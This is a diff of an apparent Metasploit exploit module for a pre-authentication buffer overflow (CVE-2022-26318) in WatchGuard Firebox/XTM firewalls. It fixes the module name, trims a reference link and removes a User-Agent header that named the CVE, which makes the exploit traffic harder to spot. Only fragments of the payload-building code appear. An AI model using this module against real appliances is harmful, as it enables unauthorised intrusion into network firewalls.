@@ -14,7 +14,7 @@ def initialize(info = {})
14
14
super (
15
15
update_info (
16
16
info ,
17
- 'Name' => 'Geutebruck instantrec Remote Command Execution' ,
17
+ 'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution' ,
18
18
'Description' => %q{
19
19
This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox
20
20
and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary
@@ -33,8 +33,7 @@ def initialize(info = {})
33
33
[ 'URL' , 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ] ,
34
34
[ 'URL' , 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ] ,
35
35
[ 'URL' , 'https://github.com/misterxid/watchguard_cve-2022-26318' ] ,
36
- [ 'URL' , 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ] ,
37
- [ 'URL' , 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2022-26318' ]
36
+ [ 'URL' , 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]
38
37
] ,
39
38
'License' => MSF_LICENSE ,
40
39
'Platform' => [ 'unix' ] ,
@@ -128,7 +127,6 @@ def create_bof_payload
128
127
def create_final_payload
129
128
http_payload = "POST /agent/login HTTP/1.1\r \n "
130
129
http_payload << "Host: #{ datastore [ 'RHOST' ] } :#{ datastore [ 'RPORT' ] } \r \n "
131
- http_payload << "User-Agent: CVE-2022-26318\r \n "
132
130
http_payload << "Accept-Encoding: gzip, deflate\r \n "
133
131
http_payload << "Accept: */*\r \n "
134
132
http_payload << "Connection: close\r \n "
0 commit comments